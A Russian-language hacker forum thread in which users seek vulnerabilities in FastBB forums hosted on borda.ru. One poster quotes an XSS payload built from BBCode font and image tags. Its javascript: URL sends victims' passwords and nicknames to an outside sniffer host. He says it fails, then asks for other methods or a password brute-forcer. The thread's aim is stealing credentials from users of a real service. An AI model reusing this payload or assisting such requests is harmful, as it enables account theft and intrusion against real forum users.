Обзор уязвимостей FastBB

Discussion in 'Болталка' started by Dr.Frank, 14 Dec 2006.

  1. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    Знает ли кто-нибудь уязвимости в форумах FastBB? точнее в тех, что стоят на borda.ru?
     
  2. Pashahak

    Pashahak Banned

    Joined:
    16 Jan 2007
    Messages:
    17
    Likes Received:
    8
    Reputations:
    -33
    Хдопцы, а действительно, возможно ЛИ это сделать? А если возможно, то как? Всем известно что в фастББ пароли храняться в открытом виде. Я пробовал сплоита залить такого:

    [font color=[img src=http://s.netsec.ru/s.gif/style=display:none;background:url(javascript:document.images[1].src="http://s.netsec.ru//s.gif?id=79&"+pass+nick); ]][/font]

    А потом со сниффера прочитать пасс. ( про этот сплоит с видео узнал ) тико тама он почему-то не срабатывает. И другим пользователям виден этот скрипт в НЕ зашифрованном виде. Мож еще как-то можна хоть что-то вытянуть. А мож переборщик паролей какой-то есть? Я уже все надежды потерял. А писал к администрации www.borda.ru так там говорят что форум вообще не имеет ни одной уязвимости. Мож кто все-таки что-то знает?